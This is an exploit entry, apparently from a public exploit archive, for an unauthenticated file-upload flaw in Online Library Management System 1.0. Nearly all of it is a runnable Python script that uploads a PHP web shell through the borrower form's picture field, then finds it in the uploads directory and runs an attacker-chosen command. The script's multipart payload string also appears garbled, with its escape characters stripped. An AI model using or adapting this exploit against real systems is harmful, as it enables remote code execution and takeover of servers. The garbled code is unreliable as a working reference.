Online Library Management System version 1.0 suffers from a remote shell upload vulnerability. This is a formal exploit for the vulnerability priorly discovered by Jyotsna Adhana in October of 2020.
# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)
# Date: 23-06-2021
# Exploit Author: Berk Can Geyikci
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip
# Version: 1.0
# Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28
# Exploit Tested Using: Python 3.8.6
'''
Steps To Produce:
1)Click Books
2)Select one book and click Read more
3)Get the book id from url #example_url http://localhost/ols/index.php?q=bookdetails&id=15243678
4)Execute Python Script with URL, Book id and Command
'''
'''
Import required modules:
'''
import sys, hashlib, requests
import urllib
import time
import random
try:
#settings
target_url = sys.argv[1]
book_id = sys.argv[2]
command = sys.argv[3]
except IndexError:
print("- usage: %s <target> <book_id> <command>" % sys.argv[0])
print("- Example: %s http://example.com 15243678 'whoami'" % sys.argv[0])
sys.exit()
url = target_url+"/ols/proccess.php?action=add"
session = requests.Session()
session.get(target_url+"/ols")
session_cookies = session.cookies
php_cookie = session.cookies.get_dict()['PHPSESSID'].strip()
print("Getting Session Cookie= "+php_cookie)
random_borrower_id = random.randint(0,999999)
#Headers to upload php
headers = {
"Accept-Encoding": "gzip, deflate",
"Referer": target_url + "/ols/index.php?q=borrow&id="+ book_id +"/",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBA3sFU893qYE7jKq",
"Upgrade-Insecure-Requests": "1",
"Connection": "close",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Cookie": "PHPSESSID="+php_cookie
}
req = requests.get(target_url+"/ols/index.php?q=borrow&id="+book_id, headers=headers)
data = "------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="id"rnrn15243678rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="BorrowerId"rnrn"+str(random_borrower_id)+"rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="deptid"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="Firstname"rnrndummy_firstnamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="deptid"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="Lastname"rnrndummy_lastnamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="deptid"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="MiddleName"rnrndummy_middlenamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="Address"rnrndummy_addressrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="optionsRadios"rnrnMalern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="ContactNo"rnrn1rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="CourseYear"rnrn2021rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="BUsername"rnrndummy_usernamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="BPassword"rnrndummy_rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="picture"; filename="rcepoc_"+str(random_borrower_id)+".php"rnContent-Type: application/octet-streamrnrn<?phprnrnrnrnecho shell_exec('"+command+"');rnrnrnrn?>rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="save"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKq--rn"
req = requests.post(url, headers=headers, data=data)
print("Uploading file...")
req = requests.get(target_url+"/ols/proccess.php?action=checkout&id="+book_id, headers=headers)
#print(req.text)
req = requests.get(target_url+"/ols/borrower/", headers=headers)
#print(req.text)
req = requests.get(target_url+"/ols/asset/images/borrower/", headers=headers)
reqq = req.text
#print(reqq)
reqqq = reqq.find(str(random_borrower_id))
command_result = reqq[reqqq-21:reqqq+10]
req = requests.get(target_url+"/ols/asset/images/borrower/"+command_result+"", headers=headers)
print("Command Result = "+req.text)
